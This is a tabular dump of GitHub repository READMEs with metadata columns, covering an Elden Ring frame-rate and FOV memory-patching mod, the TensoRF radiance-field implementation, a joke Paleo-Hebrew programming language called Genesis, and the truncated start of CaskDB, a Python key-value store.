repo
stringlengths
7
106
readme
stringlengths
1
512k
โŒ€
description
stringlengths
1
3.38k
โŒ€
topics
stringlengths
2
244
โŒ€
releases
int64
0
1k
contributors
int64
0
10k
pulls
int64
0
66.4k
commits
int64
1
463k
issues
int64
0
14.5k
branches
int64
1
4.52k
workflows
int64
0
116
uberhalit/EldenRingFpsUnlockAndMore
# Elden Ring FPS Unlocker and more A small utility to remove frame rate limit, change FOV (Field of View), add widescreen supprt, alter Game Speed and various game modifications for [Elden Ring](https://en.bandainamcoent.eu/elden-ring/elden-ring) written in C#. More features soon! Patches games memory while running, does not modify any game files. Works with every game version (legit steam & oh-not-so-legit), should work with all future updates. ## Download **[Get the latest release here](https://github.com/uberhalit/EldenRingFpsUnlockAndMore/releases)** ## Features * does not modify any game files, RAM patches only * works with legit, unmodified steam version as well as with unpacked, not-so-legit versions * unlock frame rate (remove FPS limit) * remove forced 60 Hertz (Hz) limit in fullscreen * increase or decrease field of view (FOV) * disable camera auto rotate adjustment on movement (intended for mouse users) * disable centering of camera (cam reset) on lock-on if there is no target * add support for widescreen monitors * game modifications * global game speed modifier (increase or decrease) * disable losing Runes on death ## Preview [![Elden Ring FPS Unlocker and more](https://user-images.githubusercontent.com/19159295/156041448-ba5e08df-bb5e-4ac7-a8f0-772d8f039f76.png)](#) ## Usage **Make sure the game is running in offline mode and the AntiCheat (EAC) isn't running.**. The graphic setup has to be done only once but as the patcher hot-patches the memory **you have to start the patcher every time you want to use any of its features**. The game enforces VSYNC and forces 60 Hz in fullscreen even on 144 Hz monitors so we have to override these. #### **Nvidia**: Use Nvidia Control Panel to set 'Preferred Refreshrate' to 'Highest available' on a Elden Ring Profile, if you aren't using GSYNC/FreeSYNC then set 'Vsync' to 'Off'. #### **AMD**: Use Radeon Settings to set 'Wait for Vertical Refresh' to 'Enhanced Sync', 'Fast Sync' or 'Always Off' on a Elden Ring profile. ### Follow these steps on Nvidia (see below for GSYNC): 1. Open Nvidia Control Panel 2. Navigate to `Display -> Change resolution` 3. **Make sure your monitor is set to the highest Refresh rate possible:** 4. [![Make sure your monitor is set to the highest Refresh rate possible](https://user-images.githubusercontent.com/19159295/155911492-f6410e73-bcc9-457a-b2da-57f7625c3b68.PNG)](#) 5. Navigate to `3D Settings -> Manage 3D settings -> Program Settings -> Elden Ring` 6. **Set `Preferred refresh rate` to `Highest available`** 7. **Set `Vertical sync` to `Off`** 8. [![Preferred refresh rate to Highest available, VSYNC to Off](https://user-images.githubusercontent.com/19159295/155911494-a50af476-5367-42b1-90f1-106aaa28f368.PNG)](#) 9. Hit apply and close Nvidia Control Panel 10. Start `Elden Ring FPS Unlocker and more` and start the game through the first button 11. Set your new refresh rate limit, tick the checkbox and click `Patch game` ### Follow these steps on AMD: 1. Right click on Desktop -> `Display settings` 2. Scroll down and click `Advanced Display Settings -> Display Adapter Properties` 3. **Switch to `Monitor` tab and make sure your monitor is set to the highest Refresh rate possible:** 4. [![Make sure your monitor is set to the highest Refresh rate possible](https://camo.githubusercontent.com/8ba71a0b512eb68509f7e7506a92a78f3cd47537/68747470733a2f2f692e696d6775722e636f6d2f61774b4862774d2e706e67)](#) 5. Open Radeon Settings 6. Navigate to `Gaming -> Elden Ring` or add it manually if it's missing: `Add -> Browse -> Elden Ring` 7. **Set `Wait for Vertical Refresh` to `Enhanced Sync`, `Fast Sync` or `Always Off`**: 8. [![Wait for Vertical Refresh Enhanced Sync](https://camo.githubusercontent.com/7c00daebb59c7e46c455e30b6caa055c63185dcb/68747470733a2f2f692e696d6775722e636f6d2f456e77595146322e706e67)](#) 9. Apply and close Radeon Settings 10. Start `Elden Ring FPS Unlocker and more` and start the game through the first button 11. Set your new refresh rate limit, tick the checkbox and click `Patch game` ### To play the game with GSYNC do these additional steps (Nvidia): 1. Under Nvidia Control Panel navigate to `3D Settings -> Manage 3D settings -> Program Settings -> Elden Ring` 2. Set `Monitor Technology` to `G-SYNC` 3. You can keep `Vertical sync` on `Use the 3D application setting` now to help remove frame time stutters ([see here](https://www.blurbusters.com/gsync/gsync101-input-lag-tests-and-settings/15/)) 4. Make sure that `Preferred refresh rate` is still set to `Highest available` 5. [![GSYNC Settings](https://user-images.githubusercontent.com/19159295/155911496-5fda4bc9-1b8e-4f79-a76d-4a130d65fbe6.PNG)](#) 6. Don't forget to Apply and close Nvidia Control Panel 7. Use a 3rd party frame rate limiter like [RTSS](https://www.guru3d.com/files-details/rtss-rivatuner-statistics-server-download.html) and set a frame rate limit just a few fps below your monitor refresh rate, on a 144Hz Monitor use 138 8. Start `Elden Ring FPS Unlocker and more` and start the game through the first button 9. Set your new refresh rate limit, tick the checkbox and click `Patch game` ### On 'Change FOV by (%)' Increase or decrease the games Field Of Fiew (FOV) between -95% and +95%. ### On 'Widescreen support' Adds your monitors **native resolution** to the games video options overwriting the default 1920x1080 resolution. This will allow widescreen monitors to use their full resolution and aspect ratio. ### On 'Disable Steam check' Normally you don't have to tick this checkbox (except when you are drinking rum while sailing the sea). Ticking this will tell the utility to not start Steam when it tries to launch the game. If your game isn't starting then untick this. ### On 'Disable camera auto rotate on movement': Will disable the automatic camera rotation adjustments when you are moving. This is mostly intended for mouse users, enabling it on non-native windows controllers might not work correctly. ## On 'Disable camera reset on lock-on': If you press your target lock-on key and no target is in sight the game will reset the camera position and disable your input while it's doing so. Ticking this checkbox will remove this behaviour of the game. ### On 'Disable Runes loss on death': Like 'Unseen Aid' in Sekiro you will not lose any Runes upon death with this option enabled. ### On 'Game speed': Slow down the game to beat a boss like a game journalist or speed it up and become gud. Game speed acts as a global time scale and is used by the game itself to create a dramatic effect in a few cutscenes. All game physics (even opening the menu) will be affected equally: all time-critical windows like dodge and deflect will be proportionally prolonged or shortened while the amount of damage given and taken as well as all other damage physics will be unaltered. A hit from an enemy on 150% game speed will do the exact same damage as on 80%, the deflect window on 50% is exactly twice as long as on 100% and so on. Of course, your character will be affected by the speed too so even though a time window might be different now, the speed which you can react on it is different too. Be aware that the speed modifier can potentially crash the game in certain cutscenes and NPC interactions so use it with caution. ## Troubleshooting: * Make sure you followed the appropriate steps and didn't skip any * Try disabling `Fullscreen optimization` for Elden Ring: right mouse click on `eldenring.exe -> Compatibility-> tick 'Disable fullscreen optimizations'` * If you are using ReShade make sure your preset doesn't enforce 60 Hz, try removing ReShade and see if it solves the problem * Game isn't starting when you click "Start game"? Untick 'Disable Steam check' * Try adding the whole game folder and `Elden Ring FPS Unlocker and more` to your antivirus's exclusion list * Try disabling `Steam Broadcast` (streaming via overlay) * Try to force disable VSYNC even when you are using GSYNC/FreeSync/FastSync * Close and disable all screen recording and streaming applications * Close and disable all overlays * Close and disable all performance "booster" programs and alike * Do a clean reinstall of your graphic driver: 1. Download latest graphics driver for your GPU 2. Download [DDU](https://www.guru3d.com/files-get/display-driver-uninstaller-download,1.html) 3. Disconnect internet so windows update won't auto-install minimal driver as soon as you uninstall them 4. Boot into safe mode 5. Completely uninstall graphics driver and all of their utilities using DDU 6. Reboot 7. Install the latest driver you previously downloaded 8. Reconnect internet ## Prerequisites * .NET Framework 4.8 * administrative privileges (for patching) * 64 bit OS ## Building Use Visual Studio 2022 to build and remove the missing `icon.ico` from build process. ## Contributing Feel free to open an issue or create a pull request at any time ## License This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details ## Credits * huovnn for their contribution to disable the automatic camera adjustments on movement * [Darius Dan](http://www.dariusdan.com) for the icon ## Limitations * the game has forced VSYNC so unlocking the frame rate when your monitor has 60Hz will do nothing. You'll have to disable VSYNC in Nvidia Control Panel or AMD Radeon Settings first, see Usage * in fullscreen the game forces the monitor to 60 Hz so you'll have to handle this with driver override too, see Usage * your monitor has to natively support the widescreen resolution otherwise it won't show up correctly * game speed modification can potentially crash the game in certain cutscenes and NPC interactions, use with caution ## Version History * v1.1.0.0 (2022-03-22) * added option to disable camera auto-rotate * added option to disable camera reset on lock-on if no target is in range * added option to disable Steam-check * v1.0.0.1 (2022-02-28) * fixed an issue with pattern on 'disabling runes loss' * v1.0.0.0 (2022-02-28) * fixed issue with widescreen support not setting correct aspect ratio * made game start-up and checks more robust * fixed an issue with game start-up on certain systems * disabling runes loss upon death will now no longer drop the runes you didn't loose onto the ground * better cleanup on exit * v0.0.0.5-beta (2022-02-27) * frame rate unlock now removes 60 Hz lock in fullscreen too (screw you FromSoft!) * added widescreen support patch * fixed a bug that would prevent re-starting the game correctly after exiting through main menu * minor fixes * v0.0.0.4-beta (2022-02-26) * fixed issues with FOV changer * added game speed modifier * added option to disable Runes penalty upon death * fixed game exe selection if exe isn't called 'eldenring.exe' * improved stability * v0.0.0.3-beta (2022-02-25) * added FOV changer * added handling of alternative version of EAC service (thanks to [DubbleClick](https://github.com/DubbleClick)) * added handling of non-english characters in installation paths (thanks to [mrdellis](https://github.com/mrdellis)) * v0.0.0.2-beta (2022-02-25) * added game checks * fixed broken game start * added prompt to select game installation path * removed reference to external MS DLL * multiple fixes * added icon * v0.0.0.1-beta (2022-02-25) * Initial release
A small utility to remove frame rate limit, change FOV, add widescreen support and more for Elden Ring
gaming
3
4
14
22
60
1
0
apchenstu/TensoRF
# TensoRF ## [Project page](https://apchenstu.github.io/TensoRF/) | [Paper](https://arxiv.org/abs/2203.09517) This repository contains a pytorch implementation for the paper: [TensoRF: Tensorial Radiance Fields](https://arxiv.org/abs/2203.09517). Our work present a novel approach to model and reconstruct radiance fields, which achieves super **fast** training process, **compact** memory footprint and **state-of-the-art** rendering quality.<br><br> https://user-images.githubusercontent.com/16453770/158920837-3fafaa17-6ed9-4414-a0b1-a80dc9e10301.mp4 ## Installation #### Tested on Ubuntu 20.04 + Pytorch 1.10.1 Install environment: ``` conda create -n TensoRF python=3.8 conda activate TensoRF pip install torch torchvision pip install tqdm scikit-image opencv-python configargparse lpips imageio-ffmpeg kornia lpips tensorboard ``` ## Dataset * [Synthetic-NeRF](https://drive.google.com/drive/folders/128yBriW1IG_3NJ5Rp7APSTZsJqdJdfc1) * [Synthetic-NSVF](https://dl.fbaipublicfiles.com/nsvf/dataset/Synthetic_NSVF.zip) * [Tanks&Temples](https://dl.fbaipublicfiles.com/nsvf/dataset/TanksAndTemple.zip) * [Forward-facing](https://drive.google.com/drive/folders/128yBriW1IG_3NJ5Rp7APSTZsJqdJdfc1) ## Quick Start The training script is in `train.py`, to train a TensoRF: ``` python train.py --config configs/lego.txt ``` we provide a few examples in the configuration folder, please note: `dataset_name`, choices = ['blender', 'llff', 'nsvf', 'tankstemple']; `shadingMode`, choices = ['MLP_Fea', 'SH']; `model_name`, choices = ['TensorVMSplit', 'TensorCP'], corresponding to the VM and CP decomposition. You need to uncomment the last a few rows of the configuration file if you want to training with the TensorCP model๏ผ› `n_lamb_sigma` and `n_lamb_sh` are string type refer to the basis number of density and appearance along XYZ dimension; `N_voxel_init` and `N_voxel_final` control the resolution of matrix and vector; `N_vis` and `vis_every` control the visualization during training; You need to set `--render_test 1`/`--render_path 1` if you want to render testing views or path after training. More options refer to the `opt.py`. ### For pretrained checkpoints and results please see: [https://1drv.ms/u/s!Ard0t_p4QWIMgQ2qSEAs7MUk8hVw?e=dc6hBm](https://1drv.ms/u/s!Ard0t_p4QWIMgQ2qSEAs7MUk8hVw?e=dc6hBm) ## Rendering ``` python train.py --config configs/lego.txt --ckpt path/to/your/checkpoint --render_only 1 --render_test 1 ``` You can just simply pass `--render_only 1` and `--ckpt path/to/your/checkpoint` to render images from a pre-trained checkpoint. You may also need to specify what you want to render, like `--render_test 1`, `--render_train 1` or `--render_path 1`. The rendering results are located in your checkpoint folder. ## Extracting mesh You can also export the mesh by passing `--export_mesh 1`: ``` python train.py --config configs/lego.txt --ckpt path/to/your/checkpoint --export_mesh 1 ``` Note: Please re-train the model and don't use the pretrained checkpoints provided by us for mesh extraction, because some render parameters has changed. ## Training with your own data We provide two options for training on your own image set: 1. Following the instructions in the [NSVF repo](https://github.com/facebookresearch/NSVF#prepare-your-own-dataset), then set the dataset_name to 'tankstemple'. 2. Calibrating images with the script from [NGP](https://github.com/NVlabs/instant-ngp/blob/master/docs/nerf_dataset_tips.md): `python dataLoader/colmap2nerf.py --colmap_matcher exhaustive --run_colmap`, then adjust the datadir in `configs/your_own_data.txt`. Please check the `scene_bbox` and `near_far` if you get abnormal results. ## Citation If you find our code or paper helps, please consider citing: ``` @INPROCEEDINGS{Chen2022ECCV, author = {Anpei Chen and Zexiang Xu and Andreas Geiger and Jingyi Yu and Hao Su}, title = {TensoRF: Tensorial Radiance Fields}, booktitle = {European Conference on Computer Vision (ECCV)}, year = {2022} } ```
[ECCV 2022] Tensorial Radiance Fields, a novel approach to model and reconstruct radiance fields
3d-reconstruction,3d-modelling,3d-rendering
0
1
9
16
53
1
0
elonlit/Genesis
# Genesis ***๐ค*** [![Open Source Love svg2](https://badges.frapsoft.com/os/v2/open-source.svg?style=for-the-badge)](https://github.com/ellerbrock/open-source-badges/) > "*My frame was not hidden from you, when I was being made in secret, intricately woven in the depths of the earth. Your eyes saw my unformed substance; in your book were written, every one of them, the days that were formed for me, when as yet there was none of them*" [^1] Genesis is an interpreted, procedural, and Turing-complete Paleo-Hebrew programming language. Diacritical signs are forgone for simplification, though maybe Nikud can be used in prospect as a means for more reserved keywords. <p align="center"> <img src="https://img.shields.io/badge/Platforms-win%20%7C%20linux%20%7C%20osx-lightgrey" /> <!--<img src="https://img.shields.io/powershellgallery/p/DNS.1.1.1.1" />--> <a href="https://github.com/elonlit/Genesis/blob/master/LICENSE"> <img src="https://img.shields.io/badge/license-HOLY--LICENSE-yellow" /> </a> </p> <p align="center"> <a href="#valid-keywords">Keywords</a> โ€ข <a href="#operations-punctuation-elements--identifiers">Operators</a> โ€ข <a href="#data-types--literals">Types</a> โ€ข <a href="#control-flow">Control Flow</a> โ€ข <a href="#subroutines">Subroutines</a> โ€ข <a href="#data-structures">Data Structures</a> โ€ข <a href="#math-library--native-utilities">Utilities</a> โ€ข <a href="#faq">FAQ</a> </p> --- ## Valid Keywords | Lexeme | ๐ค Equivalent(s) | | ------------- | ------------- | | Print | ๐ค„๐คƒ๐ค๐คŽ | | Print Line | ๐ค„๐คƒ๐ค๐คŽ๐ค‡ | | Declare/Initialize Variable | ๐ค„๐ค‚๐คƒ๐ค“ | | Declare Subroutine | ๐ค๐ค…๐ค๐ค’๐ค‘๐ค‰๐ค„ | | If | ๐ค€๐คŒ | | Then | ๐ค€๐ค† | | While | ๐ค๐ค๐ค…๐คƒ | | For | ๐ค๐ค๐ค…๐ค“ | | For Each | ๐ค๐ค๐ค…๐ค“๐คŠ๐ค‹ | | Sleep | ๐ค‰๐ค”๐ค | | Consecrate | ๐ค’-๐คƒ-๐ค” | The `๐ค’-๐คƒ-๐ค”` keyword, meaning literally "to consecrate" or "to purify," denotes when the scope of a subroutine or loop terminates. ## Operations, Punctuation Elements, & Identifiers Java-style syntax and precedence are preserved for most operators: `+` - addition (numbers, strings)<br /> `-` - subtraction (numbers)<br /> `/` - division (numbers)<br /> `*` - multiplication (numbers)<br /> `^` - power (numbers)<br /> `=` - assignment (numbers, strings)<br /> `==` - logical equals (numbers, strings)<br /> `=!` - not equal to (numbers, strings)<br /> `<` - less than (numbers)<br /> `>` - greater than (numbers)<br /> `=>` - greater than or equal to (numbers)<br /> `=<` - less than or equal to (numbers)<br /> `&&` - logical and (booleans)<br /> `||` - logical or (booleans)<br /> However, the associativity of most operators is from right-to-left: <pre dir="rtl" align="right"> ๐ค„๐ค‚๐คƒ๐ค“ ๐ค๐ค… = ๐คŠืด๐ค‡ - ๐ค„ืณ // 23 </pre> Identifiers can be represented by alphanumeric text (including `_`) and do not have to start with an alphabetic character. ## Data Types & Literals Genesis is weakly and dynamically typed, so casting between primitives is handled implicitly by the interpreter. There are three data types: 1. Number - Encompasses `Bytes`, `Shorts`, `Integers`, `Longs`, `Doubles`, and `Floats`. 2. Boolean - Supports literals `๐ค€๐คŒ๐ค•` or `๐ค”๐ค’๐ค“`, which correspond to `True` or `False`, respectively. 3. String - Delimited by quotation marks, e.g. `"!๐ค”๐ค‹๐ค…๐คŒ ๐ค๐ค…๐ค‹๐คŒ"`. The Paleo-Hebrew alphabet may have used gematria to denote cardinal values, although there is only evidence of this on the Samaria Ostraca and Dead Sea Scroll 4Q252. This quasi-decimal isopsephic number system is adopted for a lack of an academic consensus. In this paradigm of numerology, there is no notation for zero, and the numeric values for individual letters are added together. Each unit (`1`, `2`, ..., `9`) is assigned a separate letter, each tens (`10`, `20`, ..., `90`) a separate letter, and the first four hundreds (`100`, `200`, `300`, `400`) a separate letter. The later hundreds (`500`, `600`, `700`, `800`, and `900`) are represented by the sum of two or three letters representing the first four hundreds. To represent numbers from `1,000` to `999,999`, the same letters are reused to serve as thousands, tens of thousands, and hundreds of thousands. Biblical pseudepigrapha use these transformations extensively. Standard (normative value) encoding per the conventional affine Mispar Hechrachi method of gematria is as follows: | Decimal | Hebrew | ๐ค Glyph | | --- | --- | --- | | 1 | Alep | ๐ค€ | | 2 | Bet | ๐ค | | 3 | Gimel | ๐ค‚ | | 4 | Dalet | ๐คƒ | | 5 | He | ๐ค„ | | 6 | Waw | ๐ค… | | 7 | Zayin | ๐ค† | | 8 | Het | ๐ค‡ | | 9 | Tet | ๐คˆ | | 10 | Yod | ๐ค‰ | | 20 | Kaf | ๐คŠ | | 30 | Lamed | ๐ค‹ | | 40 | Mem | ๐คŒ | | 50 | Nun | ๐ค | | 60 | Samek | ๐คŽ | | 70 | Ayin | ๐ค | | 80 | Pe | ๐ค | | 90 | Sade | ๐ค‘ | | 100 | Qop | ๐ค’ | | 200 | Res | ๐ค“ | | 300 | Sin | ๐ค” | | 400 | Taw | ๐ค• | Gershayim `ืด` (U+05F4 in Unicode, and resembling a double quote mark) (sometimes erroneously referred to as merkha'ot, which is Hebrew for double quote) are inserted before (to the right of) the last (leftmost) letter to indicate that the sequence of letters represents a gematric sequence of at least two Hebrew numerals (e.g., `28` โ†’ `๐คŠืด๐ค‡` and `5782` โ†’ `๐ค•๐ค•๐ค•๐ค•๐ค•๐ค•๐ค•๐ค•๐ค•๐ค•๐ค•๐ค•๐ค•๐ค•๐ค•๐ค’๐คืด๐ค`). Similarly, a single geresh `ืณ` (U+05F3 in Unicode, and resembling a single quote mark) is appended after (to the left of) a single letter in the case where a number is represented by a single Hebrew numeral (e.g. `100` โ†’ `๐ค’ืณ`). ## Control Flow > "*Seek the Lord while he may be found; call on him while he is near*" [^2] The standard suite of loop constructs is supported. An iterative implementation for generating the first ten terms of the Fibonacci sequence using a `๐ค๐ค๐ค…๐คƒ` loop is formulated as an example: <pre dir="rtl" align="right"> ๐ค„๐ค‚๐คƒ๐ค“ ๐คŒ๐คŽ๐ค๐ค“ = ๐ค‰ืณ ๐ค„๐ค‚๐คƒ๐ค“ ๐ค“๐ค€๐ค”๐ค…๐ค = ๐ค€ืณ ๐ค„๐ค‚๐คƒ๐ค“ ๐ค”๐ค๐ค‰๐ค„ = ๐ค€ืณ - ๐ค€ืณ ๐ค„๐ค‚๐คƒ๐ค“ ๐คƒ๐ค‹๐ค๐ค’ = ๐ค€ืณ - ๐ค€ืณ ๐ค„๐ค‚๐คƒ๐ค“ ๐ค†๐คŒ๐ค๐ค‰ = ๐ค€ืณ - ๐ค€ืณ ๐ค๐ค๐ค…๐คƒ ๐คƒ๐ค‹๐ค๐ค’ <= ๐คŒ๐คŽ๐ค๐ค“: ๐ค„๐คƒ๐ค๐คŽ๐ค‡ ๐ค”๐ค๐ค‰๐ค„ ๐ค†๐คŒ๐ค๐ค‰ = ๐ค“๐ค€๐ค”๐ค…๐ค + ๐ค”๐ค๐ค‰๐ค„ ๐ค“๐ค€๐ค”๐ค…๐ค = ๐ค”๐ค๐ค‰๐ค„ ๐ค”๐ค๐ค‰๐ค„ = ๐ค†๐คŒ๐ค๐ค‰ ๐คƒ๐ค‹๐ค๐ค’ = ๐คƒ๐ค‹๐ค๐ค’ + ๐ค€ืณ ๐ค’-๐คƒ-๐ค” </pre> The following `๐ค๐ค๐ค…๐ค“` loop prints out the first ten natural numbers: <pre dir="rtl" align="right"> ๐ค๐ค๐ค…๐ค“ ๐คŒ๐คŽ๐ค๐ค“=๐ค‰ืณ,๐คŒ๐คŽ๐ค๐ค“>=๐ค€ืณ,๐คŒ๐คŽ๐ค๐ค“=๐คŒ๐คŽ๐ค๐ค“-๐ค€ืณ: ๐ค„๐คƒ๐ค๐คŽ๐ค‡ ๐คŒ๐คŽ๐ค๐ค“ ๐ค’-๐คƒ-๐ค” </pre> To accomplish nested operations or anamorphism, it is recommended to do a composition of subroutines. ## Subroutines > "*'I AM THAT I AM'*" [^3] Functions in Genesis are declared using the `๐ค๐ค…๐ค๐ค’๐ค‘๐ค‰๐ค„` keyword. Being void and non-parameterized, however, they are actually subroutines. There is recursion insomuch that making a self-referential call from within a subroutine is possible, but there is no means to exit that recursion to express the irrevocable danger of pride and egoism. This design follows the contention that recursion, as Peter Deutsch identified, is divine and not encompassed by the domain of human programmers, as evidenced by God identifying himself recursively. <!--- > "*For if, after they have returned from the defilements of the world by the knowledge of the Lord and Savior Jesus Christ, they are again entangled in them and are overcome, the last state has become worse for them than the first*"--> To call on a subroutine, use the reference name with which it was defined. The following subroutine `๐ค‡๐ค‰๐ค๐ค…๐ค“` approximates the gravitational force of a 290-gram KJV Compact Ultraslim Bible one meter from a 70-kg human being: <pre dir="rtl" align="right"> ๐ค„๐ค‚๐คƒ๐ค“ ๐คŠ๐ค…๐ค‡ = (๐ค€ืณ / (๐ค‰ืณ ^ ๐ค‰ืด๐ค€)) * (๐ค•๐ค“๐คŽืด๐ค† / ๐ค’ืณ) ๐ค„๐ค‚๐คƒ๐ค“ ๐ค•๐ค…๐ค“๐ค„ = ๐คŠืด๐คˆ / ๐ค’ืณ ๐ค„๐ค‚๐คƒ๐ค“ ๐ค€๐คƒ๐คŒ = ๐คืณ ๐ค„๐ค‚๐คƒ๐ค“ ๐คŒ๐ค“๐ค‡๐ค’ = ๐ค€ืณ ๐ค๐ค…๐ค๐ค’๐ค‘๐ค‰๐ค„ ๐ค‡๐ค‰๐ค๐ค…๐ค“: ๐ค„๐ค‚๐คƒ๐ค“ ๐ค„๐ค‡๐ค‰๐ค๐ค…๐ค“ = (๐คŠ๐ค…๐ค‡ * ๐ค•๐ค…๐ค“๐ค„ * ๐ค€๐คƒ๐คŒ) / (๐คŒ๐ค“๐ค‡๐ค’ * ๐คŒ๐ค“๐ค‡๐ค’) ๐ค„๐คƒ๐ค๐คŽ ๐ค„๐ค‡๐ค‰๐ค๐ค…๐ค“ ๐ค’-๐คƒ-๐ค” ๐ค‡๐ค‰๐ค๐ค…๐ค“ </pre> Other examples can be found in the respository. ## Data Structures Genesis provides fixed-length untyped array data structures. Curly braces are used to initialize arrays, and elements can be accessed or mutated through square bracket index operators: <pre dir="rtl" align="right"> ๐ค„๐ค‚๐คƒ๐ค“ ๐คŒ๐คŽ๐ค๐ค“ = {๐ค€ืณ, ๐คืณ, ๐ค‚ืณ} ๐คŒ๐คŽ๐ค๐ค“[๐คˆืณ/๐คˆืณ] = ๐ค”๐ค’๐ค“ ๐ค๐ค๐ค…๐ค“๐คŠ๐ค‹ ๐ค€๐ค‹๐คŒ๐ค๐คˆ, ๐คŒ๐คŽ๐ค๐ค“: ๐ค„๐คƒ๐ค๐คŽ๐ค‡ ๐ค€๐ค‹๐คŒ๐ค๐คˆ ๐ค’-๐คƒ-๐ค” </pre> As denoted, `๐ค๐ค๐ค…๐ค“` or `๐ค๐ค๐ค…๐ค“๐คŠ๐ค‹` looping an array will yield its values. ## Math Library & Native Utilities | Function | Description | ๐ค Equivalent(s) | | :-- | --- | --: | | Sqrt(#) | Returns the correctly rounded positive square root of a number value. | ๐ค”๐ค…๐ค“๐ค”(๐ค) | | Sin(โˆ ) | Returns the trigonometric sine of an angle. | ๐คŽ๐ค‰๐ค(๐คˆ) | | Cos(โˆ ) | Returns the trigonometric cosine of an angle. | ๐ค’๐ค…๐คŽ(๐คˆ) | | Tan(โˆ ) | Returns the trigonometric tangent of an angle. | ๐คˆ๐ค(๐คˆ) | | ToDegrees(C) | Converts an angle measured in radians to degrees. | ๐ค‹๐คƒ(๐ค’) | | ToRadians(โˆ ) | Converts an angle measured in degrees to radians. | ๐ค‹๐ค“(๐คˆ) | | Absolute(#) | Returns the absolute value of a number value. | ๐ค๐คŒ๐ค‡(๐ค) | | Log(#) | Returns the natural logarithm (base *e*) of a number value. | (๐ค)๐ค‹๐ค…๐ค‚ | | Exp(#) | Returns Euler's number *e* raised to the power of a number value. | (๐ค)๐ค€๐ค’๐คŽ๐ค | | Ulp(#) | Returns the size of an ulp of the argument. | (๐ค)๐ค€๐ค…๐ค‹๐ค | | PI() | Returns ฯ€ rounded to double precision. | ()๐ค๐ค‰๐ค‰ | | Random() | Returns a number value greater than or equal to 0.0 and less than 1.0. | ()๐ค“๐ค๐คƒ | | Evince() | Returns a random Bible quote. | ()๐ค๐ค“๐ค€ | Some calculations: <pre dir="rtl" align="right"> ๐ค„๐ค‚๐คƒ๐ค“ ๐ค”๐คˆ๐ค‡ = ๐คƒืณ * ๐ค๐ค‰๐ค‰() * (๐ค‰ืด๐ค ^ ๐คืณ) ๐ค„๐ค‚๐คƒ๐ค“ ๐คŒ๐ค”๐ค…๐ค‹๐ค” = (๐ค€ืณ/๐คืณ) * (๐ค„ืณ * ๐คŽืด๐คƒ * ๐คŽ๐ค‰๐ค(๐คŒืด๐ค„)) ๐ค„๐ค‚๐คƒ๐ค“ ๐ค’๐ค‹ = ๐ค”๐ค…๐ค“๐ค”(๐คŽืด๐คƒ) * ๐ค“๐ค๐คƒ() ๐ค„๐คƒ๐ค๐คŽ๐ค‡ ๐ค”๐คˆ๐ค‡ ๐ค„๐คƒ๐ค๐คŽ๐ค‡ ๐คŒ๐ค”๐ค…๐ค‹๐ค” ๐ค„๐คƒ๐ค๐คŽ๐ค‡ ๐ค’๐ค‹ </pre> A subroutine for calculating the energy of an electron in the <i>`๐ค`</i>-th orbital of a hydrogenic atom in Joules: <pre dir="rtl" align="right"> ๐ค๐ค…๐ค๐ค’๐ค‘๐ค‰๐ค„ ๐ค€๐ค๐ค“๐ค‚๐ค‰๐ค„: ๐ค„๐ค‚๐คƒ๐ค“ ๐ค = ๐คืณ ๐ค„๐ค‚๐คƒ๐ค“ ๐ค‚๐ค€๐ค…๐ค‹ = ((๐ค‚ืณ * (๐ค‰ืณ ^ ๐ค‡ืณ)) * ((๐ค‰ืด๐ค€ / ๐ค‰ืณ) * (๐ค‰ืณ ^ ๐ค†ืณ)) * (((๐ค”ืณ + ๐ค”ืณ * ๐ค‰ืณ) / (๐ค•ืด๐ค’)) * (๐ค‰ืณ ^ (๐ค…ืณ - ๐คŒืณ))) * (๐ค€ืณ - ๐คืณ)) * (๐ค€ืณ / (๐ค * ๐ค)) ๐ค„๐คƒ๐ค๐คŽ ๐ค‚๐ค€๐ค…๐ค‹ ๐ค’-๐คƒ-๐ค” ๐ค€๐ค๐ค“๐ค‚๐ค‰๐ค„ </pre> FAQ ------ ### Why not use Modern Hebrew? If you are able to program in this language, I have failed. ### Why are you running an interpreted language over an interpreted language? > "*Wherefore, just as sin came into the world through one man, and death through sin, and so death spread to all men because all sinned*" [^4] ### Why not make an object-oriented language? This suggestion makes me consternated. Genesis will never be object-oriented because the Bible explicitly forbids object worship: > "*These prized objects are really worthless. The people who worship idols donโ€™t know this, so they are all put to shame. []Their eyes are closed, and they cannot see. Their minds are shut, and they cannot think. The person who made the idol never stops to reflect, 'Why, itโ€™s just a block of wood! I burned half of it for heat and used it to bake my bread and roast my meat. How can the rest of it be a god? Should I bow down to worship a piece of wood?'*" [^5] [^1]: [Psalm 139:13-16](https://www.biblegateway.com/passage/?search=Psalm%20139%3A13-16&version=NIV) [^2]: [Isaiah 55:6-7](https://www.biblegateway.com/passage/?search=Isaiah%2055%3A6-7&version=KJV) [^3]: [Exodus 3:14](https://www.biblegateway.com/passage/?search=Exodus%203%3A14&version=KJV) [^4]: [Romans 5:12-13](https://biblia.com/bible/esv/romans/5/12-13) [^5]: [Isaiah 44:9-20](https://www.biblestudytools.com/nlt/isaiah/passage/?q=isaiah+44:9-20)
God's actual programming language.
bible,hebrew,procedural-programming,interpreter
2
2
2
32
9
1
0
avinassh/py-caskdb
![logo](assets/logo.svg) # CaskDB - Disk based Log Structured Hash Table Store ![made-with-python](https://img.shields.io/badge/Made%20with-Python-1f425f.svg) [![build](https://github.com/avinassh/py-caskdb/actions/workflows/build.yml/badge.svg)](https://github.com/avinassh/py-caskdb/actions/workflows/build.yml) [![codecov](https://codecov.io/gh/avinassh/py-caskdb/branch/master/graph/badge.svg?token=9SA8Q4L7AZ)](https://codecov.io/gh/avinassh/py-caskdb) ![GitHub License](https://img.shields.io/github/license/avinassh/py-caskdb) [![twitter@iavins](https://img.shields.io/twitter/follow/iavins?style=social)](https://twitter.com/iavins) ![architecture](https://user-images.githubusercontent.com/640792/167299554-0fc44510-d500-4347-b680-258e224646fa.png) CaskDB is a disk-based, embedded, persistent, key-value store based on the [Riak's bitcask paper](https://riak.com/assets/bitcask-intro.pdf), written in Python. It is more focused on the educational capabilities than using it in production. The file format is platform, machine, and programming language independent. Say, the database file created from Python on macOS should be compatible with Rust on Windows. This project aims to help anyone, even a beginner in databases, build a persistent database in a few hours. There are no external dependencies; only the Python standard library is enough. If you are interested in writing the database yourself, head to the workshop section. ## Features - Low latency for reads and writes - High throughput - Easy to back up / restore - Simple and easy to understand - Store data much larger than the RAM ## Limitations Most of the following limitations are of CaskDB. However, there are some due to design constraints by the Bitcask paper. - Single file stores all data, and deleted keys still take up the space - CaskDB does not offer range scans - CaskDB requires keeping all the keys in the internal memory. With a lot of keys, RAM usage will be 